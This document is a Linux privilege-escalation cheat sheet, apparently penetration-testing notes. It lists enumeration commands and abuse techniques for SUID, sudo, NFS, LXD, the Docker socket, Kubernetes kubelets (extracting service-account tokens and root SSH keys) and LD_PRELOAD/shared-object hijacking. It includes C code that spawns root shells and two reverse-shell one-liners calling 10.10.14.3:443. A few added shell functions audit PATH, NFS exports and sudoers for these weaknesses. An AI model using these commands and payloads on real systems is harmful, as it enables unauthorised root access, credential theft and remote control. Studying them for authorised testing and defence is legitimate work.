Linux Privilege Escalation
Enumeration
General command
whoami
id
hostname
ip a (or ifconfig)
sudo -l
OS Related
OS Version
cat /etc/os-release
Kernel Version
uname -r
uname -a
cat /proc/version
Users
LoggedIn User
w
who
lastlog
Home Directory Content
ls /home
ls -la /home/<username>/
ls -l ~/.ssh
Environment
echo $PATH
env
Shell Installed
cat /etc/shells
Bash History
history
Sudo Privileges
sudo -l
Users
cat /etc/passwd
cat /etc/group
getent group <group>
Interesting Files
Configuration Files
Extensions to look for: .conf, .config, .xml, .bak
find / -type f \( -name "*.conf" -o -name "*.config" \) -exec ls -l {} \; 2>/dev/null
find / ! -path "*/proc/*" -iname "*config*" -type f 2>/dev/null
Scripts File
find / -type f -name "*.sh" 2>/dev/null | grep -v "src\|snap\|share"
Readable Shadow File
/etc/shadow
Files & Dir
find / -type f -name ".*" -exec ls -l {} \; 2>/dev/null
find / -type d -name ".*" -ls 2>/dev/null
ls -l /tmp /var/tmp /dev/shm
Finding History Files
find / -type f \( -name "*_hist" -o -name "*_history" \) -exec ls -l {} \; 2>/dev/null
Find Writable
Directories
find / -path /proc -prune -o -type d -perm -o+w 2>/dev/null
Files
find / -path /proc -prune -o -type f -perm -o+w 2>/dev/null
Services & Internal Enumeration
Cron Jobs
ls -la /etc/cron.daily/
File System and Additional Drives
lsblk -> drives
lpstat -> printers
cat /etc/fstab -> drives / file systems
df -h -> mounted file systems
cat /etc/fstab | grep -v "#" | column -t -> unmounted file systems
Network
ip a
route
netstat -r
arp -a
cat /etc/resolv.conf
cat /etc/hosts
Binaries
ls -l /bin /usr/bin/ /usr/sbin/
Hardware
lscpu
Running Services
find /proc -name cmdline -exec cat {} \; 2>/dev/null | tr " " "\n"
List Current Process
ps aux | grep <user> (or root)
ps au
Sudo Version
sudo -V
Installed Packages and Version
apt list --installed | tr "/" " " | cut -d" " -f1,3 | sed 's/[0-9]://g' | tee -a installed_pkgs.list
Misconfiguration
Path Abuse
Check the PATH env variable for writable, relative or empty entries
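An added check for this step (not part of the original notes): it walks a PATH string and reports entries that are relative or empty (resolved from the current directory) or whose directory is group- or world-writable, which is what makes PATH abuse possible. Pass it $PATH, or the PATH a cron job or sudo rule runs with.

```shell
# check_path_writable PATH_STRING
# Prints one line per risky entry: relative/empty entries and directories
# writable by group or others. Silent when the PATH is clean.
check_path_writable() {
    # Subshell: the IFS change and set -f (no globbing) must not leak to the caller.
    (
        set -f
        IFS=':'
        for d in $1; do
            case "$d" in
                ""|.|./*|..|../*)
                    # An empty or relative entry is searched from the cwd.
                    printf '%s (relative entry)\n' "${d:-<empty>}"
                    continue ;;
            esac
            [ -d "$d" ] || continue
            # -perm -o+w: world-writable, -perm -g+w: group-writable (same test the notes use)
            if [ -n "$(find "$d" -maxdepth 0 -type d \( -perm -o+w -o -perm -g+w \) 2>/dev/null)" ]; then
                printf '%s\n' "$d"
            fi
        done
    )
}
```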
Wildcard Abuse
Check if
*, ?, [], ~, -
SETUID and SETGID permissions
find "$DIRECTORY" -perm /4000
find "$DIRECTORY" -perm /2000
find "$DIRECTORY" -perm /u=s,g=s
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
find / -user root -perm -6000 -exec ls -ldb {} \; 2>/dev/null
Sudo Right Abuse
sudo -l
Weak NFS
showmount -e 10.129.2.12
cat /etc/exports
Copy shell to /mnt and add SETUID
cp shell /mnt
chmod u+s /mnt/shell
sudo mount -t nfs 10.129.2.12:/tmp /mnt
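An added audit for the NFS case above (not from the original notes): the SETUID-copy trick only works when the export is configured with no_root_squash, so remote root is not mapped to nobody. This function parses an exports file and flags exports with no_root_squash or open to any client (*). The file path is an argument so it can be run on a constructed copy; on a real host use /etc/exports.

```shell
# audit_exports EXPORTS_FILE
# Prints "<path> <client> <reason>" for every client spec that allows a
# remote root to create root-owned files (no_root_squash) or that is
# exported to every host (*). Comment and blank lines are skipped.
audit_exports() {
    (
        set -f   # client specs contain "*" and "(" which must not be globbed
        grep -Ev '^[[:space:]]*(#|$)' "$1" | while read -r path clients; do
            # One export line may carry several "host(opt,opt)" specs.
            for spec in $clients; do
                case "$spec" in
                    *\(*\)) host=${spec%%\(*}; opts=${spec#*\(}; opts=${opts%\)} ;;
                    *)      host=$spec; opts="" ;;
                esac
                reason=""
                case ",$opts," in
                    *,no_root_squash,*) reason="no_root_squash" ;;
                esac
                if [ "$host" = "*" ]; then
                    reason="${reason:+$reason,}world-exportable"
                fi
                if [ -n "$reason" ]; then
                    printf '%s %s %s\n' "$path" "$host" "$reason"
                fi
            done
        done
    )
}
```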
Hijacking Tmux Session
Check
tmux process running as a privileged user (dev group only)
ps aux | grep tmux
ls -la /shareds
tmux -S /shareds
Capabilities
CAP_SETUID, CAP_SETGID, CAP_SYS_ADMIN
Enumerate
find /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin -type f -exec getcap {} \;
Privileged Groups
LXC/LXD
Starting a privileged container with privileged=true
lxd init
lxc image import alpine.tar.gz alpine.tar.gz.root --alias alpine
lxc init alpine r00t -c security.privileged=true
lxc config device add r00t mydev disk source=/ path=/mnt/root recursive=true
lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
lxc start r00t
lxc exec r00t /bin/sh
Docker: see Docker Abuse
Disk
ADM
Service and process Abuse
Cron Job Abuse
/etc/cron.d
ls -la /etc/cron.daily/
Find writable file
find / -path /proc -prune -o -type f -perm -o+w 2>/dev/null
Enumerate running process
./pspy64 -pf -i 1000
Docker Abuse
Docker: same as Linux
Interesting
docker.sock - /var/run/docker.sock
/tmp/docker -H unix:///app/docker.sock ps
/tmp/docker -H unix:///app/docker.sock run --rm -d --privileged -v /:/hostsystem main_app
/tmp/docker -H unix:///app/docker.sock ps
/tmp/docker -H unix:///app/docker.sock exec -it 7ae3bcc818af /bin/bash
docker -H unix:///var/run/docker.sock run -v /:/mnt --rm -it ubuntu chroot /mnt bash
Kubernetes
Each pod functions as a separate virtual machine on a node, complete with its own IP, hostname, and other details.
Control Plane -> master node (all TCP)
etcd: 2379, 2380
API Server: 6443
Scheduler: 10251
Controller manager: 10252
Kubelet API: 10250
Read-Only Kubelet API: 10255
Minion -> Worker Node
API Server Interaction
curl https://10.129.10.11:6443 -k
Extracting Pods
curl https://10.129.10.11:10250/pods -k | jq .
Extracting pod
kubeletctl -i --server 10.129.10.11 pods
Available Commands
kubeletctl -i --server 10.129.10.11 scan rce
Execute Command
kubeletctl -i --server 10.129.10.11 exec "id" -p nginx -c nginx
Extracting Token
kubeletctl -i --server 10.129.10.11 exec "cat /var/run/secrets/kubernetes.io/serviceaccount/token" -p nginx -c nginx | tee -a k8.token
Extracting Certificates
kubeletctl --server 10.129.10.11 exec "cat /var/run/secrets/kubernetes.io/serviceaccount/ca.crt" -p nginx -c nginx | tee -a ca.crt
List Privileges
export token=$(cat k8.token)
kubectl --token=$token --certificate-authority=ca.crt --server=https://10.129.10.11:6443 auth can-i --list
Creating new pod
kubectl --token=$token --certificate-authority=ca.crt --server=https://10.129.96.98:6443 apply -f privesc.yaml
kubectl --token=$token --certificate-authority=ca.crt --server=https://10.129.96.98:6443 get pods
Extracting root ssh key
kubeletctl --server 10.129.10.11 exec "cat /root/root/.ssh/id_rsa" -p privesc -c privesc
LogRotate
logrotate
cat /etc/logrotate.conf
sudo cat /var/lib/logrotate.status
ls /etc/logrotate.d/
cat /etc/logrotate.d/dpkg
Requirements for exploiting:
write permission on the log files
run as root
vulnerable version e.g., 3.8.6, 3.11.0, 3.15.0, 3.18.0
Tools - https://github.com/whotwagner/logrotten
Shared Library
General Information
Static libraries (.a): compiled into and part of the program
Dynamically linked shared object libraries (.so): can be altered
Specify location of dynamic libraries:
when compiling: -rpath or -rpath-link
using env: LD_RUN_PATH or LD_LIBRARY_PATH
placing in /lib or /usr/lib
changing /etc/ld.so.conf
LD_PRELOAD - load a library before executing the binary
ldd binary
Exploiting LD_PRELOAD
LD_PRELOAD
Compile a .so object:
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>   /* declares setuid/setgid; missing from the original snippet */
void _init() {
    unsetenv("LD_PRELOAD");  /* avoid re-preloading in the spawned shell */
    setgid(0);
    setuid(0);
    system("/bin/bash");
}
gcc -fPIC -shared -o root.so root.c -nostartfiles
sudo LD_PRELOAD=/tmp/root.so /usr/sbin/apache2 restart
Shared Object Hijacking
Searching for non-standard libraries: use
ldd <binary>
Find the RUNPATH configuration (loads shared libraries from a custom location):
readelf -d payroll | grep PATH
Before creating a new library, find the function name the binary calls:
run the program and look at the undefined symbol
Create malicious shared object
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>   /* declares setuid; missing from the original snippet */
void dbquery() {      /* same name as the undefined symbol the binary imports */
    printf("Malicious library loaded\n");
    setuid(0);
    system("/bin/sh -p");
}
gcc src.c -fPIC -shared -o /development/libshared.so
Python Library Hijacking
Wrong write permission
Change the content of the library where it is used
#!/usr/bin/env python3
import psutil
available_memory = psutil.virtual_memory()
grep -r "def virtual_memory"
Library Path
python3 -c 'import sys; print("\n".join(sys.path))'
module imported from target
write permission on specific module or on higher module
ls -al <path>
PYTHONPATH environment variable
PYTHONPATH is an environment variable that indicates what directory (or directories) Python searches for modules to import.
sudo PYTHONPATH=/newPATHWithLib /usr/bin/python3 ./mem_status.py
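An added audit (not from the original notes) that serves both the LD_PRELOAD and the PYTHONPATH sections: both tricks only work when sudo keeps the variable (env_keep) or lets the user set it (SETENV). The function scans a sudoers-style file for those settings; the file path is an argument so constructed copies can be checked, and on a real host /etc/sudoers plus /etc/sudoers.d/* are the inputs.

```shell
# Variables that change what code a sudo'ed binary loads.
DANGEROUS_ENV='LD_PRELOAD|LD_LIBRARY_PATH|PYTHONPATH|PERL5LIB'

# audit_sudoers_env SUDOERS_FILE
# Prints "env_keep: <line>" for env_keep entries that preserve one of the
# variables above, and "SETENV: <line>" for rules or Defaults that let the
# caller set arbitrary variables. Comments (including #includedir) are skipped.
audit_sudoers_env() {
    grep -Ev '^[[:space:]]*(#|$)' "$1" | while IFS= read -r line; do
        if printf '%s\n' "$line" | grep -q 'env_keep' &&
           printf '%s\n' "$line" | grep -Eqw "($DANGEROUS_ENV)"; then
            printf 'env_keep: %s\n' "$line"
        # "(^|[^O])SETENV:" matches the SETENV tag but not NOSETENV;
        # "Defaults ... setenv" is the global form of the same permission.
        elif printf '%s\n' "$line" | grep -Eq '(^|[^O])SETENV:|Defaults.*[[:space:]]setenv'; then
            printf 'SETENV: %s\n' "$line"
        fi
    done
}
```

Clean output does not prove a host safe: sudo rules for interpreters or build tools can still be abused without any environment variable, as the rest of this page shows.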
Various
Passive Traffic Capture
net-creds - https://github.com/DanMcInerney/net-creds
PCredz - https://github.com/lgandx/PCredz
0-day & Kernel Exploit
Sudo
Polkit
DirtyPipe
DirtyCow
Netfilter
Rev Shell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.3 443 >/tmp/f
bash -i >& /dev/tcp/10.10.14.3/443 0>&1
Tools
LinEnum
strace - to capture credentials
readelf
ldd
Resources